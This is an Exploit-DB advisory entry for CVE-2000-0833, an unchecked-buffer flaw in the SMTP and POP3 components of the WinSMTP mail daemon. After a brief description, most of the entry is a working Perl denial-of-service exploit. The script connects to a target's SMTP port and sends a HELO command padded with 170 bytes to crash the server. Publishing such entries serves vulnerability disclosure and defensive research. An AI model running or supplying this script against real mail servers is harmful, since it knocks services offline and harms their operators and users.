Jack De Winter WinSMTP 1.6 f/2.0 - Buffer Overflow Vulnerability

ID EDB-ID:20221
Type exploitdb
Reporter Guido Bakker
Modified 2000-09-11T00:00:00


Jack De Winter WinSMTP 1.6 f/2.0 Buffer Overflow Vulnerability. CVE-2000-0833. Dos exploit for windows platform

                                            source: http://www.securityfocus.com/bid/1680/info

A number of unchecked buffers exist in the SMTP and POP3 components of Jack De Winter's WinSMTP mail daemon which could lead to denial of service attacks or arbitrary code execution, depending on the data entered.

Sending a HELO command consisting of approximately 170 bytes or a USER command consisting of approximately 370 bytes will result in a Windows general protection fault error.

# ./$0.pl -s <server>
# sends data to stmpd, overflowing server buffer.
use Getopt::Std;
use IO::Socket;
getopts('s:', \%args);
$serv = $args{s};
$foo = "A"; $number = 170; 
$data .= $foo x $number; $EOL="\015\012";
$remote = IO::Socket::INET->new(
		    Proto	=> "tcp",
		    PeerAddr	=> $args{s},
		    PeerPort	=> "smtp(25)",
		) || die("Unable to connect to smtp port at $args{s}\n");
print $remote "HELO $data". $EOL;
while (<$remote>){ print }

print("\nCrash was successful !\n");

sub usage {die("\n$0 -s <server>\n\n");}